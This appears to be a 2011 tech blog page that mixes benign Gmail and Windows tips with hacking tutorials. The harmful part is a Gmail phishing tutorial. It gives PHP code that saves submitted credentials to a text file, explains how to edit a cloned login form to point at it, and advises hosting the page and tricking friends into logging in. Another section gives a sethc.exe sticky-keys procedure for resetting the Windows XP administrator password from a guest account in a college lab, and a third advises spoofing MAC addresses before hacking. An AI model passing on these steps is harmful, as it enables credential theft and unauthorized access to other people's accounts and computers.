Saturday, February 12, 2011

100 Great Gmail Hacks for Email Addicts


This post is from  Emma Taylor of  Accreditedonlinecolleges.com

If you're a Gmail user, you know that it's a powerful email tool, even if you're just using it for basic functions. However, there are so many options and hacks that you can take advantage of to take your email to the next level that it can be worth your while to learn a little bit more about what Gmail is really capable of doing. Read on to learn about 100 ways to hack Gmail for the better.
Shortcuts
Take these shortcuts to work in Gmail faster.

  1. Keyboard Shortcuts: These shortcuts will help you avoid having to use your mouse in Gmail.
  2. Use Quick Links: Quick Links can bookmark anything in Gmail to set up quick access.
  3. See shortcuts: Type "?" to get a shortcut popup.
  4. Set up custom shortcuts: You can set up custom keyboard shortcuts through Gmail's settings.
  5. Use EOM: Type "EOM" or (EOM) in the subject line of a subject-only message, and Gmail won't ask you if you want to add text to the body.
  6. Shift-click: You can select multiple messages using Shift-click.

Moving & Identity
Move over to Gmail and manage your identity using these hacks.

  1. Change your Gmail email ID: This hack will help you find a solution for changing your Gmail ID.
  2. Change your From and Reply to address: Tweak these settings to show the address you want.
  3. Import your email: You can import mail and contacts from other email providers, and even have messages forwarded.

Automation
These hacks will help make Gmail work for you.

  1. Set up repetitive emails: Set up AutoHotKey HotStrings to take care of repetitive email quickly.
  2. Check your POP3 More Often: With this hack, you'll be able to have Gmail check your POP3 accounts often.
  3. Set Gmail as your default: Go into your settings to use Gmail for Mail To links.
  4. Save notes in your drafts: Keep notes handy by saving them in your drafts.
  5. Look at the title of your web browser: You can see the number of the new emails you have by looking at the title of your web browser.

Tools
These tools can ramp up your Gmail experience.

  1. Resizeable Textarea: This extension will allow you to change your text area without resizing your browser window.
  2. Better Gmail: Better Gmail adds features like hierarchical labels, unread messages, and more.
  3. GMAIL Backup Tool: Backup your Gmail with these tools.
  4. dragdropupload: With this add-on, you can drag and drop files directly to your Gmail.
  5. GTDInbox for Gmail: Use this extension to use Getting Things Done productivity.
  6. Greasemonkey: Make use of these Gmail scripts to make everything Gmail easier.

Composing
Put these hacks to work when writing emails.

  1. Drag and drop: You can drag and drop attachments instead of using the attach button.
  2. Change your default font and styling: This hack will allow you to change the default appearance of your emails.
  3. Add an HTML Signature: With this hack, you'll be able to add an HTML signature to your email.
  4. Forward all: You can forward an entire conversation in a single email.
  5. Insert images: Share screenshots and other images with this hack.
  6. Create a mail merge: Use this hack for a mail merge in Gmail.
  7. Quote selected text: In a long thread, just pull out the text you really want to respond to.
  8. Use canned responses: Gmail has a new feature that allows you to save email templates and insert them right into your email.
  9. Quickly address Gmail users: Send an email to another Gmail user just by entering their username.
  10. Go offline: Take Gmail offline with Labs.
  11. Send email from your phone: Gmail has a free IMAP sync with your phone's email client.

Time Savers
With these hacks, you'll save time in Gmail.

  1. Preview attachments: Make sure you actually need to download a file by previewing them first.
  2. See which emails are sent to you: With personal level indicators, you can find out if an email was sent to you directly.
  3. Right click to read: Preview any email just by right clicking on it.
  4. Mark unread from here: Mark messages unread from a certain point using this feature.
  5. Convert to HTML: You can convert PDF, Word and more to HTML just by sending them as an attachment.
  6. Download all of your attachments: Use this hack to download every attachment from Gmail.
  7. Add multiple attachments to an email: Hold down your Ctrl key or Shift to add a group of attachments to your email.

Storage
These hacks will help you use Gmail as storage.

  1. Scan your manuals: Create PDFs of your manuals and email them to yourself.
  2. Mail yourself disallowed files: Certain files are not allowed to be mailed, but you can save them in your drafts folder.
  3. Backup your messages: You can forward email to a different address just in case.
  4. Use Gmail for MP3 or Storage: Here you'll find out how to use GMail to store your MP3 files and play them.

Organization
You can keep Gmail well organized with these hacks.

  1. Clean up by moving emails: Clean your inbox using Move to like folders.
  2. Create aliases: You can create an infinite number of + aliases for Gmail.
  3. Merge contacts: Use this hack to merge all of your duplicate email contacts.
  4. Prefix labels: Use unique characters to bring labels up to the top of alphabetized lists.
  5. Use Superstars: Choose between several star icons to flag your messages.
  6. Sort by unread: Type "in:inbox is:unread" to filter all unread messages.
  7. Create filters: Filter emails so you don't have to move them to folders later.
  8. Archive: Tidy up your inbox and put old email into storage using archiving.
  9. Use stars: Indicate special emails with the help of stars.
  10. Manage all your email accounts: Use Gmail to manage all of your accounts at once.
  11. Use labels: Scan your inbox quickly using labels. 

Read more from here

http://www.accreditedonlinecolleges.com/blog/2010/100-great-gmail-hacks-for-email-addicts/

How toHack Gmail Account Password Hacking


We will we use very popular method to hack Gmail account password.I have posted this method for hacking facebook account password earlier  and now gmail account.That is Phishing.This is one of the best method to hack gmail  password.This will work only if your friend don't know about this method of hacking gmail.
For this We need three files:

1.Fake gmail login page
2.Php file
3.Text file to store password

Create your php file

1.Open notepad and copy this code:

header ("Location: https://gmail.com");
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($ handle, "\r\n");
fclose($handle) ;
exit;
?>

2.Now save this as gmailphishing.php
Your php file is now created
If you Don't understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Create gmail fake login page

Now  go to http://www.gmail.com and right click / View Source.Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
We need to find the place where Login  code in gmail page that where send the user after clicking on it.
Now Press crtl-f after opening source code and   search for this code

action=anything.
In this case we have this

action="https://www.google.com/accounts/ServiceLoginAuth?service=mail"

We replace that part with:

action="gmailphishing.php"

Save your gmailfake.html file

Text file

Create a blank text file and name it password.txt

Now upload all the three files gmailfake.html,gmailphishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake gmail login page by going to http://ursite.110mb.com/gmailfake.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called "Password.txt" is created,In which the password is stored.

You can use
http://www.justfree.com/
http://www.ripway.com/

also or any other free hosting site.

Suppose you register with name gmailaccounthack.Your link will be http://www.gmailaccounhack.justfree.com/
After uploading files your phishing link will be http://www.gmailaccount.justfree.com/fakegmail.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like

"Use this on your own responsibility for educational purpose only"

Mac Address Change how to Change Mac Address xp vista windows 7


In computer networking, a Mac Address is a Media Access Control address (MAC address) is a unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification, and used in the Media Access Control protocol sub-layer. If assigned by the manufacturer, a MAC address usually encodes the manufacturer's registered identification number. It may also be known as an Ethernet Hardware Address (EHA), hardware address, adapter address, or physical address.
Whenever you are trying to do something wrong thing like hacking then you must first change mac address your computer or pc.There is a software available which can be used for changing mac address.

SMAC MAC Address Changer 2.0.5

SMAC is a powerful, yet easy to use MAC address changer for Windows systems, regardless of whether the manufacturers allow this option or not. The new MAC addresses you change will sustain from reboots. Features: change MAC address in 3 clicks, validate MAC address, generate random MAC address, view MAC address, IPConfig button, view complete network adapter information, load MAC address list, show MAC change history, show manufacturer of MAC address. Version 2.0.5 includes unspecified updates.

Download From here


http://download.cnet.com/SMAC-MAC-Address-Changer/3000-2085_4-10536535.html

How to hide Files in pictures


Hiding Files in pics(It`s a nice trick to save your data file from unauthorised access in a very simple manner)

# You will need the following.. Windows 2000 / xp
# WinRar

1. Gather your image and the files you wish to lodge into it. Here I have a ajeet.txt which I will hide inside my ashwarya.jpg.

2. Add the files(e.g ajeet.txt) you want to hide into a new RAR archive. (in the archieve name box type ajeet.txt and hit enter. Now ur file is in format ajeet.txt.rar)

3. Open Command Prompt and go to the folder where your files are located, e.g., 'C:\ajeet'.

4. At command prompt type 'copy /b ashwarya.jpg + ajeet.txt.rar ashabhi.jpg' (without quotes).
(ashwarya.jpg is the picture I want to show, ajeet.txt.rar is the file to be hidden, and ashabhi.jpg is the file which contains both).

5. Now test the ashabhi.jpg by double clicking it, and verifying it still opens.

6. Now try opening that same ashabhi.jpg file from menu i.e right click on doc.jpg file you have created : openwith->WinRar archiever. It will show the original hidden file ajeet.txt.

Now ashabhi.jpg is a simple JPEG for others, but it contains a secret file ajeet.txt for you…

Hack Windows XP Administrator Password

This is one of the best method to Hack Windows XP Administrator Password.For hacking admin you must have log in as guest or limited account.This methodod hacking sdmin is very easy.You don't need any software or live cd.All hacking is done manual.To hack XP admin password follow these steps.Please backup your files which we are going to use here.

Method

1.Go to C:/windows/system32

2.Copy cmd.exe and paste it on desktop

3.Rename cmd.exe to sethc.exe

4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes

5.Now press shift key 5 times you will get cmd prompt close that

6.Now Log out from your guest account and at the login screen,press shift key 5 times.

7.You will get commmand prompt there
Now type " NET USER ADMINISTRATOR mypassword" where "mypassword" can be any password and Administrator is name of admin account ,then press enter.

8.You will see " The Command completed successfully" and then exit the command prompt.

Thats done…You have hacked administrator password

If you have any problem comment here.Please backup your cmd.exe and sethc.exe if you are trying this on your own computer.This works because of sethc.exe process Vulnerability in Windows XP.You can search google for more information about it.
This method of hacking XP admin password can be used in your college lab where you have limited or guest access to computers

How to Disable XP VISTA shutdown

You can play this prank on your friend computer disable his shutdon option.Its very easy you have to use registry trick and tips.
You can use a Registry hack to disable the normal Shut Down. Run the Registry Editor and go to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Create a new DWORD value named NoClose with a data value of 1.

Exit the Registry and reboot in order for the change to take effect.

You won't be able to shut down Windows in the normal manner from now on; you'll have to run Task Manager by pressing Ctrl-Alt-Delete or right-clicking on the Toolbar, choosing Task Manager, and then using the Task Manager's Shut Down menu to close Windows. If you want to reenable normal shutdowns, delete the NoClose value.

How to Change Windows 7 Logon Screen Background?

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the
logon screen background.

1. The image you need to set as the background should be a .jpg file and it's size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your
image. Once you're done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to
C:\Windows\system32\oobe\info\backgrounds

You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and
navigate to the following key

HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background
If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and
select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

I hope you like this trick. Just try out and give your feedback!

How to Use God Mode in Windows 7 ?

How to Use God Mode in Windows 7

Windows 7 is now becoming popular among windows operating system  users.Windows 7 has cool hidden feature ,people calls it godmode in windows 7.GodMode is a folder that brings together a long list of customization settings allowing you to change all your settings from one place.This is very good as you can now change all your windows settings from one single place.

God Mode in Windows 7

God Mode in Windows 7

Foll the following steps to create god mode folder:

1. Create a new folder

2. Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

You can change word GodMode to any other word you like your name or your friends name

3.The folder icon will change ,then  double click it to show the GodMode windows options.

Wednesday, February 9, 2011

3 Reasons Why Your Windows Computer Clock Loses Its Time



computer clock loses timeThere are many things that most people take for granted. One of them is that clocks always show the current time. When you tend to rely on your computer's time and your computer clock loses time, this can be fatal.

There are several situations where the Windows clock starts showing the wrong time. If you're obsessed with having the exact time on your computer no matter what, you may want to set up synchronization with a remote server. Before you do that however, please note that an inaccurate Windows clock should not be taken lightly.

If the computer clock loses time although you keep fixing it, there may be a serious cause. This article shows you what the underlying causes may be and how you can fix them.

1. CMOS Battery

This is the most likely scenario, especially if your computer is not brand new.

The CMOS battery sits on your computer's motherboard and provides power to the Complementary Metal Oxide Semiconductor (CMOS) chip. The CMOS chip stores information about the system configuration, including the date and time. The CMOS battery makes sure the chip can store this data even while the computer is turned off and not hooked up to power. If the battery goes bad, the chip starts losing information and one of the symptoms is that your computer no longer maintains its time and date.

computer clock loses time

Replacing the CMOS battery is pretty easy. You just have to turn off your computer, ground yourself, open the case, find out which type of battery (step 3 in the linked guide) sits on your motherboard, go buy it, start over, and exchange the battery. Follow the links to the keywords for articles on the respective steps.

2. Time Zone

This is an easy to fix cause for when your computer clock loses time.

Your computer may simply be set to the wrong time zone and every time you fix the time, it resets itself to that time zone when you reboot. If the minutes are correct and only the hour is bad, that's probably the issue you're dealing with.

In Windows 7 you can easily fix the time zone. Right-click the system clock in your taskbar and select > Adjust date/time. Under the headline > Time Zone check whether the information is correct. If not, click the > Change time zone… button and set your time zone. Don't forget to confirm your changes and you're all set.

computer clock not keeping time

3. Malware

This is the least pleasant and most difficult to manage scenario.

Your computer may have been hijacked by a virus that messes with your computer time. To fix it, you need to gather a few tools. First, make sure your anti-virus program is up to date with the latest virus definitions. Then get a good malware scanner, for example Malwarebytes or Spybot Search & Destroy. For more tools and links to the respective download pages, check out our The Best Of: Windows Software page.

Once you have all these tools downloaded, updated and installed, start in Safe Mode and run them. It's important to start in safe mode because the malware won't launch and be active when you choose this boot mode. This means that it is less likely to escape detection and removal.

computer clock loses time

Conclusion

It's important to pay attention to the most basic features of your computer. Simple things going wrong can be a sign of serious trouble ahead. For example if your CMOS battery dies, your computer will act like it has Alzheimers and you have to introduce it to its hardware components (via the BIOS) every time it boots. That's just as annoying as a virus that plays tricks on you or a bad time zone setting that messes up everything from the clock to your email client's time stamps. So be wise and act immediately.

Be sure to also check out Jeffry's article on synchronizing your PC clock with an atomic clock.

Do you sync the time on your computer and what made you set that up?